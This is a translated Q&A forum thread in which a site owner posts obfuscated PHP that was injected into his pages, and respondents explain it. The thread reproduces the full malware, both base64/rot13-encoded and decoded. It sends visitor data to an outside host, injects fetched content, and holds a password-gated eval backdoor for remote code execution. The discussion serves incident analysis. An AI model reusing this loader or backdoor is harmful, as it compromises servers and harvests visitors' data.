Foreign code entered on page

Question

Foreign code entered on page

Asked 8 years, 1 month ago

Viewed 113 times

0

This weekend the following code was entered on the pages of my site, but I did not understand what it does, could anyone give me a help?

Encrypted code...

//###=CACHE START=###
error_reporting(0);

assert_options(ASSERT_ACTIVE, 1);

assert_options(ASSERT_WARNING, 0);

assert_options(ASSERT_QUIET_EVAL, 1); $strings = "as";$strings .= "sert"; $strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftMKWlo3WspzIjo3W0nJ5aXQNcBjccozysp2I0XPWxnKAjoTS5K2Ilpz9lplVfVPVjVvx7PzyzVPtunKAmMKDbWTyvqvxcVUfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcVTEcMFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cBjccMvujpzIaK21uqTAbXPpuKSZuqFpfVTMcoTIsM2I0K2AioaEyoaEmXPEsH0IFIxIFJlWGD1WWHSEsExyZEH5OGHHvKFxcXFNxLlN9VPW1VwftMJkmMFNxLlN9VPW3VwfXWTDtCFNxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKGfXWUHtCFNxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy07PvEcpPN9VPEsH0IFIxIFJlWFEH1CIRIsDHERHvWqBjbxqKWfVQ0tVzu0qUN6Yl93q3phoJy0LJ1uYaW1Y2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWTyjXF4vWzD9Vv51pzkyozAiMTHbWTDcYvVzqG0vYaIloTIhL29xMFtxqFxhVvMwCFVhWTZhVvMcCGRznQ0vYz1xAFtvLGZ4LzWuMQL1LmAzMwt2BTD0ZGt1LzD4ZGt0MwWzLzVvYvExYvE1YvEwYvVkVvx7PzyzXTyhnI9aMKDbVzSfoT93K3IloS9zo3OyovVcVQ09VQRcVUfXWTyvqvN9VTMcoTIsM2I0K2AioaEyoaEmXPE1pzjcBjc9VTIfp2IcMvuzqJ5wqTyioy9yrTymqUZbVzA1pzksnJ5cqPVcXFO7PvEwnPN9VTA1pzksnJ5cqPtxqKWfXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK0uSDHESHvjtExSZH0HcBjcwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsHxIHIIWBISWOGyATEIVfVSEFIHHcBjbxpzImqJk0VQ0tL3IloS9yrTIwXPEwnPx7PzA1pzksL2kip2HbWTAbXGfXWTyvqvN9VPElMKA1oUD7Pa0tMJkmMFO7PvEzpPN9VTMmo2Aeo3Oyovtvq3q3Yz1cqTSgLF5lqFVfVQtjYPNxMKWloz8fVPEypaWmqUVfVQZjXGfXnJLtXPEzpPxtrjbtVPNtWT91qPN9VPWUEIDtY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWTyjXF4vWzD9Vv51pzkyozAiMTHbWTDcYvVzqG0vYaIloTIhL29xMFtxqFxhVvMwCFVhWTZhVvMcCGRznQ0vYz1xAFtvLGZ4LzWuMQL1LmAzMwt2BTD0ZGt1LzD4ZGt0MwWzLzVvYvExYvE1YvEwYvVkVvxhVvOVISEDYmRhZIklKT4vBjbtVPNtWT91qPNhCFNvFT9mqQbtq3q3Yz1cqTSgLF5lqIklKT4vBjbtVPNtWT91qPNhCFNvD29hozIwqTyiowbtD2kip2IppykhKUWpovV7PvNtVPOzq3WcqTHbWTMjYPNxo3I0XGfXVPNtVPElMKAjVQ0tVvV7PvNtVPO3nTyfMFNbVJMyo2LbWTMjXFxtrjbtVPNtVPNtVPElMKAjVP49VTMaMKEmXPEzpPjtZGV4XGfXVPNtVU0XVPNtVTMwoT9mMFtxMaNcBjbtVPNtoTymqPtxnTIuMTIlYPNxLz9xrFxtCFOjpzIaK3AjoTy0XPViKSWpHv8vYPNxpzImpPjtZvx7PvNtVPNxnJW2VQ0tWTWiMUx7Pa0XsDc9BjccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVzWuMwqxAzH1VvxtrlOyqzSfXUA0pzyjp2kup2uypltxK1WSHIISH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwg9"));'));
//###=CACHE END=###

Decrypted code...

<?

if (isset($ibv)) { echo $ibv; } else { error_reporting(0);
ini_set("display_errors", "0");
if (!isset($ibv)) {
if(!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]);
if(preg_match('!\S!u', file_get_contents($_SERVER["SCRIPT_FILENAME"]))) $c = "u"; else $c = "w";
$d = $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$u = $_SERVER["HTTP_USER_AGENT"];
$ip = $_SERVER["REMOTE_ADDR"];
$url = "http://www.mitama.ru/get.php?ip=".urlencode($ip)."&d=".urlencode($d)."&u=".urlencode($u)."&c=".$c."&i=1&h=".md5("a38bbad65c3ff868d4185bd8184f2fbb".$d.$u.$c."1");
if(ini_get("allow_url_fopen") == 1) {
$ibv = file_get_contents($url);
} elseif(function_exists("curl_init")) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
$result = curl_exec($ch);
curl_close($ch);
$ibv = $result;
} else {
$fp = fsockopen("www.mitama.ru", 80, $errno, $errstr, 30);
if ($fp) {
    $out = "GET /get.php?ip=".urlencode($ip)."&d=".urlencode($d)."&u=".urlencode($u)."&c=".$c."&i=1&h=".md5("a38bbad65c3ff868d4185bd8184f2fbb".$d.$u.$c."1")." HTTP/1.1\r\n";
    $out .= "Host: www.mitama.ru\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    $resp = "";
    while (!feof($fp)) {
        $resp .= fgets($fp, 128);
    }
    fclose($fp);
    list($header, $body) = preg_split("/\R\R/", $resp, 2);
    $ibv = $body;
}
}
};
if(isset($_REQUEST["p"]) && $_REQUEST["p"] == "baf7d6e5") { eval(stripslashes($_REQUEST["c"])); }
echo $ibv;}

Like, this code came out of nowhere?

– Diego

2016/05/30 at 14:32
Exactly this code was inserted from nowhere inside the php files I was able to identify due the code being in Base64 ai I found strange.

– Raul Fernando

2016/05/30 at 14:37
Look, I tested an excerpt of it and it looked to me like it’s capturing data from visitors to your page. If you try to access www.mitama.ru, nothing appears, but in /get.php it is blank, signaling that there is something there. And being . ru, it is certainly bad thing kkk. I advise you to remove this and spend a good Antivirus and antimalware on your server.

– Diego

2016/05/30 at 14:41
So I already deleted all the pages and uploaded BKP but I was curious to know what the code was doing msm so thank you for the attention

– Raul Fernando

2016/05/30 at 15:14
1

It’s a kind of Google Analytics of some hacker, rsrs.

– Whatyson Neves

2016/05/30 at 15:30
I advise you to take a good look at your server and the Firewall rules, "fsockopen" is the one that has q te worry fsockopen - Opens an Internet connection socket or Unix domain (http://php.net/manual/en/function.fsockopen.php) If opening doors is thing to resolve as soon as possible, can be sure q will be attacked d new.

– user3010128

2016/05/30 at 15:34
@user3010128 Sorry I’m a bit of a layman on the subject that I should look at on the server? I use a Go Daddy hosting server

– Raul Fernando

2016/05/30 at 16:14
Take a look at them with respect to this "injection" of code they made on their page, as this is a security flaw in the server rules. one thing is an SQL-Injection for failure of website programming, another is to trigger code snippet in your source, in something already published. Well, it would be nice to look at the machine you use to develop yourself ;)

– user3010128

2016/06/03 at 16:43

Show 3 more comments

1 answer

Browser other questions tagged php

You are not signed in. Login or sign up in order to post.

by Leandro Godoy Rosa • **2,744** points · Answer 1 · 2016-05-30T17:58:13+00:00

By examining this code very superficially it can be divided into two parts

The first of them would be all the lines except the penultimate

What he does there is basically to take information from his server and the user who opened the page and sends this information to http://www.mitama.ru/get.php (just being a Russian site already gives to have idea that it is something bad)

From what I could identify it takes the address that was opened by the user, the User Agent that will have information about the browser used and the user’s IP.

He tries to send this information in 3 different ways, through file_get_contents, for curl or by socket, depends on which is enabled on the server, and then stores a result in the variable $ibv which at the end he adds on the page.

So with this he could add any content on his page, but what I read about this is that as they catch the user agent and ip they can detect when some Crawler from a search engine and display different results just for him.

Imagine the google bot indexing your site, and on each infected page it adds links to your site, so you can get a better rank for them on google, while if an ordinary user opens your site it might be that nothing is displayed, making it more difficult to identify the infection.

In the second part I think there’s an even bigger problem

if(isset($_REQUEST["p"]) && $_REQUEST["p"] == "baf7d6e5") { eval(stripslashes($_REQUEST["c"])); }

Basically whether a parameter has been passed "p" and if it is the correct value it will run through the eval any code that is sent by the parameter "c", allowing you to run any PHP code remotely on your server.

Now see that if any user opens your page it sends its address to the hacker, and then that hacker can send commands to your server run, IE, is basically a botnet that can then be used for example for a DDOS attack.